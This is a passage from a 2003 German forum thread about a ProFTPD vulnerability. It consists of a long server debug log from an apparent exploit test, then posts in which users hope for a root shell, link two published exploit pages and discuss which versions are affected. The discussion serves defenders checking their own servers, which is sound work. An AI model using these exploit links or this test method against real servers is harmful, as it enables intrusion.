(10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'USER ftpadmin' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgroups" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'USER ftpadmin' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'USER ftpadmin' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'USER ftpadmin' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgroups" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "gid_name" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "auth" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "check" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - USER PRIVS 502 at mod_auth.c:1099 ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:1101 ber06075 (10.138.131.75[10.138.131.75]) - ber06075 (10.138.131.75[10.138.131.75]) - Config for NetxiraOne - FTP-Server: ber06075 (10.138.131.75[10.138.131.75]) - <IfGroup> ber06075 (10.138.131.75[10.138.131.75]) - ~/uploads ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - AllowAll ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - ~ ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - IgnoreHidden ber06075 (10.138.131.75[10.138.131.75]) - AllowAll ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - IfGroupList ber06075 (10.138.131.75[10.138.131.75]) - RootLogin ber06075 (10.138.131.75[10.138.131.75]) - AllowLogSymlinks ber06075 (10.138.131.75[10.138.131.75]) - RequireValidShell ber06075 (10.138.131.75[10.138.131.75]) - tcpNoDelay ber06075 (10.138.131.75[10.138.131.75]) - PidFile ber06075 (10.138.131.75[10.138.131.75]) - UserID ber06075 (10.138.131.75[10.138.131.75]) - UserName ber06075 (10.138.131.75[10.138.131.75]) - GroupID ber06075 (10.138.131.75[10.138.131.75]) - GroupName ber06075 (10.138.131.75[10.138.131.75]) - AccessDenyMsg ber06075 (10.138.131.75[10.138.131.75]) - AccessGrantMsg ber06075 (10.138.131.75[10.138.131.75]) - AllowFilter ber06075 (10.138.131.75[10.138.131.75]) - AllowForeignAddress ber06075 (10.138.131.75[10.138.131.75]) - AllowOverwrite ber06075 (10.138.131.75[10.138.131.75]) - AllowRetrieveRestart ber06075 (10.138.131.75[10.138.131.75]) - AllowStoreRestart ber06075 (10.138.131.75[10.138.131.75]) - AuthAliasOnly ber06075 (10.138.131.75[10.138.131.75]) - DeleteAbortedStores ber06075 (10.138.131.75[10.138.131.75]) - DirFakeGroup ber06075 (10.138.131.75[10.138.131.75]) - DirFakeMode ber06075 (10.138.131.75[10.138.131.75]) - DirFakeUser ber06075 (10.138.131.75[10.138.131.75]) - DisplayConnect ber06075 (10.138.131.75[10.138.131.75]) - DisplayFirstChdir ber06075 (10.138.131.75[10.138.131.75]) - DisplayGoAway ber06075 (10.138.131.75[10.138.131.75]) - DisplayQuit ber06075 (10.138.131.75[10.138.131.75]) - ExtendedLog ber06075 (10.138.131.75[10.138.131.75]) - HiddenStores ber06075 (10.138.131.75[10.138.131.75]) - IdentLookups ber06075 (10.138.131.75[10.138.131.75]) - LoginPasswordPrompt ber06075 (10.138.131.75[10.138.131.75]) - MaxClients ber06075 (10.138.131.75[10.138.131.75]) - MaxClientsPerHost ber06075 (10.138.131.75[10.138.131.75]) - MaxHostsPerUser ber06075 (10.138.131.75[10.138.131.75]) - MaxLoginAttempts ber06075 (10.138.131.75[10.138.131.75]) - PathDenyFilter ber06075 (10.138.131.75[10.138.131.75]) - RequireValidShell ber06075 (10.138.131.75[10.138.131.75]) - ServerIdent ber06075 (10.138.131.75[10.138.131.75]) - ShowSymlinks ber06075 (10.138.131.75[10.138.131.75]) - SyslogLevel ber06075 (10.138.131.75[10.138.131.75]) - Umask ber06075 (10.138.131.75[10.138.131.75]) - DirUmask ber06075 (10.138.131.75[10.138.131.75]) - SQLAuthenticate ber06075 (10.138.131.75[10.138.131.75]) - SQLAuthTypes ber06075 (10.138.131.75[10.138.131.75]) - SQLConnectInfo ber06075 (10.138.131.75[10.138.131.75]) - SQLDefaultGID ber06075 (10.138.131.75[10.138.131.75]) - SQLDefaultUID ber06075 (10.138.131.75[10.138.131.75]) - SQLHomedirOnDemand ber06075 (10.138.131.75[10.138.131.75]) - SQLUserTable ber06075 (10.138.131.75[10.138.131.75]) - SQLUsernameField ber06075 (10.138.131.75[10.138.131.75]) - SQLPasswordField ber06075 (10.138.131.75[10.138.131.75]) - SQLHomedirField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupTable ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupnameField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupGIDField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupMembersField ber06075 (10.138.131.75[10.138.131.75]) - TimeoutIdle ber06075 (10.138.131.75[10.138.131.75]) - TimeoutLogin ber06075 (10.138.131.75[10.138.131.75]) - TimeoutNoTransfer ber06075 (10.138.131.75[10.138.131.75]) - TimeoutStalled ber06075 (10.138.131.75[10.138.131.75]) - TimesGMT ber06075 (10.138.131.75[10.138.131.75]) - Classes ber06075 (10.138.131.75[10.138.131.75]) - DefaultChdir ber06075 (10.138.131.75[10.138.131.75]) - DefaultRoot ber06075 (10.138.131.75[10.138.131.75]) - DefaultTransferMode ber06075 (10.138.131.75[10.138.131.75]) - DeferWelcome ber06075 (10.138.131.75[10.138.131.75]) - PassivePorts ber06075 (10.138.131.75[10.138.131.75]) - UseGlobbing ber06075 (10.138.131.75[10.138.131.75]) - UseFtpUsers ber06075 (10.138.131.75[10.138.131.75]) - CURRENT-CLIENTS ber06075 (10.138.131.75[10.138.131.75]) - USER ber06075 (10.138.131.75[10.138.131.75]) - USER ftpadmin: Login successful. ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:1170 ber06075 (10.138.131.75[10.138.131.75]) - opening TransferLog '/var/log/xferlog' ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:1199 ber06075 (10.138.131.75[10.138.131.75]) - USER PRIVS 502 at mod_auth.c:697 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:701 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - Preparing to chroot() the environment, path = '/www/vhosts/ftp' ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:62 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system chroot() ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:69 ber06075 (10.138.131.75[10.138.131.75]) - Environment successfully chroot()ed. ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:1242 ber06075 (10.138.131.75[10.138.131.75]) - SETUP PRIVS at mod_auth.c:1249 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - unable to chdir to ~/ (No such file or directory), defaulting to chroot directory /www/vhosts/ftp ber06075 (10.138.131.75[10.138.131.75]) - FS: using system chdir() ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): path = '/', fullpath = '/www/vhosts/ftp/'. ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_cap ber06075 (10.138.131.75[10.138.131.75]) - mod_cap/1.0: capabilities '= cap_chown,cap_net_bind_service+ep' ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_ifsession ber06075 (10.138.131.75[10.138.131.75]) - mod_ifsession/0.9: <IfGroup> not matched, skipping ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_ls ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'TYPE A' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'TYPE A' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'TYPE A' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'TYPE A' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'TYPE A' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'TYPE A' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PORT 10,138,131,75,135,8' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,8' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,8' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): path = '/126841268412684.txt', fullpath = '/www/vhosts/ftp/126841268412684.txt'. ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system lstat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - FS: using system open() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - local : 10.138.131.75:20 ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - remote : 10.138.131.75:34568 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system close() ber06075 (10.138.131.75[10.138.131.75]) - Transfer aborted after 32768 bytes in 0.02 seconds ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD_ERR command 'RETR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD_ERR command 'RETR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD_ERR command 'RETR 126841268412684.txt' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD_ERR command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,9' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,9' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'PORT 10,138,131,75,135,9' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PORT 10,138,131,75,135,9' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,9' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,9' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): path = '/126841268412684.txt', fullpath = '/www/vhosts/ftp/126841268412684.txt'. ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system lstat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - FS: using system open() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - local : 10.138.131.75:20 ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - remote : 10.138.131.75:34569 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system close() ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'RETR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'RETR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'RETR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'RETR 126841268412684.txt' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'RETR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - Transfer completed: 41984 bytes in 3.17 seconds ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - FTP session closed. ber06075 - FS: using system lstat() ber06075 - ProFTPD terminating (signal 3) ber06075 - ROOT PRIVS at main.c:1829 ber06075 - RELINQUISH PRIVS at main.c:1850 ber06075 - ProFTPD 1.2.9rc2 standalone mode SHUTDOWN ber06075 - ROOT PRIVS at main.c:1857 ber06075 - RELINQUISH PRIVS at main.c:1859 Meine Version ist aber glaube schon mit Patch und die ohne hab ich nicht mehr :? Titel: Sorry fürs warten Beitrag von: Shine am 13. Oktober 2003, 18:44:41 hi,
sorry fürs lange warten auf eine antwort ... @Wörsty: wie es aussieht bist du auch nicht "weiter" gekommen ... ist wohl auch gut so, obwohl ich doch gerne gesehen hätte wie mir eine (root)-shell entgegenspringt .. Titel: Sicherheitslücke Beitrag von: smurfy am 14. Oktober 2003, 10:50:04 also derzeit gibt es 2 exploids!
http://www.k-otik.com/exploits/10.13.proft_put_down.c.php und das was ihr da geposted habt: http://www.k-otik.com/exploits/10.04.proftpd_xforce.c.php bye smurfy Titel: Sicherheitslücke Beitrag von: smurfy am 15. Oktober 2003, 10:59:12 blöde frage, diese beiden exploids.. die sind doch alle nur mit der non p version von der 1.2.8 oder?
ich hab nur das vom 04.10 getested und da geht ned.. aber das andere war ich zu faul zum testen.. ich hab derzeit meinen ftp runtergefahren aus sicherheit ;) bye smurfy Titel: Sicherheitslücke Beitrag von: Wörsty am 15. Oktober 2003, 11:00:16 Natürlich nur für die ungepatchte Version.
|